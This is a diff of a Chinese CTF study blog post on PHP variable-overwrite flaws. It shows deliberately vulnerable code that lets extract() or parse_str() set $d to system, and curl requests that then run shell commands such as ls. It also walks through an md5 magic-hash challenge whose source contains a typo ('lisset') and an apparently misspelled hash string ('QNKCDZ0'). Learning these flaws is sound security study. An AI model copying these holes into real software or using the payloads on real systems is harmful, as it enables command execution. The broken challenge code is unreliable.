记录本体项目代码修改部分

--- a/docs/views/numerology/2024-12-07-CTFLearn.md
+++ b/docs/views/numerology/2024-12-07-CTFLearn.md
@@ -34,7 +34,9 @@ publish: true
 
 ### 变量覆盖：
 
-用传参的值替换原有变量的值
+#### **定义：**用传参的值替换原有变量的值
+
+#### **举例：**
 
 ```php
 <?php
@@ -42,8 +44,6 @@ $a="abc";
 $a="def";
 echo($a);
 ?>
-
->def
 ```
 
 变量覆盖常考的三个函数：
@@ -56,11 +56,13 @@ echo($a);
 
 ![image-20241207211457286](/img/ctfLearn/image-20241207211457286.png)
 
-这个函数的意思是：将数组的键做为变量，将数组的值作为变量的值
+#### **定义：**
+
+将数组的键做为变量，将数组的值作为变量的值
 
 图中这里就是用Cat覆盖掉了Original，我们Extract()函数的本质是为了开发，只是演变歪了
 
-举例：
+#### **入侵示例：**
 
 ```php
 <?php
@@ -77,13 +79,17 @@ curl http://127.0.0.1:8088/test.php?arr[d]=system
 -X POST -d "a=ls"
 ```
 
-解释：
+#### **入侵示例解释：**
 
 我们传入的arr[d]=system，在给到extract()函数以后，生成了一个$d的变量，变量的值是system，此时用var_dump()函数，它应该会显示string 'system' (length=6)等信息，走到下一行，@system执行外部命令，用的是POST方法传入的参数a，a的值可以是linux命令，比如ls、cat等。
 
 ### Parse_str()函数：
 
-**定义：**把查询字符串解析到变量中。
+#### **定义：**
+
+把查询字符串解析到变量中。
+
+#### **方法举例：**
 
 ```php
 <?php
@@ -91,5 +97,69 @@ parse_str("name=Bill&age=60");
 echo $name."<br>";
 echo $age;
 ?>
+```
+
+```php
+<?php
+parse_str("name=Bill&age=60",$myArray);
+print_r($myArray);
+?>
+```
+
+#### **入侵示例：**
+
+对php版本有要求，视频中用的是php5
+
+```php
+<?php
+$arr = $_GET['arr'];
+parse_str($arr);
+var_dump($d);
+@$d($_POST['a']);
+?>
+```
+
+```
+//此时我们发送请求
+curl http://127.0.0.1:8088/test.php?arr=d=system
+-X POST -d "a=ls"
+```
+
+#### **入侵示例解释：**
+
+我们传入的arr=d=system，在给到parse_str()函数以后，生成了一个$d的变量，变量的值是system，此时用var_dump()函数，它应该会显示string 'system' (length=6)等信息，走到下一行，@system执行外部命令，用的是POST方法传入的参数a，a的值可以是linux命令，比如ls、cat等。
+
+### **结论：**
+
+变量覆盖不管是用extract()函数还是parse_str()函数，变量覆盖或者是创建变量本身都没有安全风险，但后续的代码有部分危险操作，所以导致了整个的风险
+
+### 综合题
+
+题目源代码：
+
+```php
+<?php
+if(!lisset($_GET['id'])){
+	show_source(__FILE__);
+	die;
+}
+include_once('flag.php');
+$a='TESTCTF';
+$id=$_GET['id'];
+@parse_str($id);
+if($a[0]!='QNKCDZ0' && md5($a[0]) == md5('QNKCDZ0')){
+	die($flag);
+}else{
+	die('emmm');
+}
+```
+
+我们需要传入以下参数
+
+```java
+//首先，我们看看md5('QNKCDZ0')的值，发现是个科学计数法的形式，我们需要让md5($a[0])也是一个科学计数法的形式，就能让他两弱等于
+//其次，我们看到@parse_str($id);需要我们理解parse_str的用法，传入一个a=b的形式，同时把a替换为a[0]，把b替换为s878926199a，让它满足a[0]不是QNKCDZ0且md5相等的条件
+
+?id=a[0]=s878926199a
 ```
 
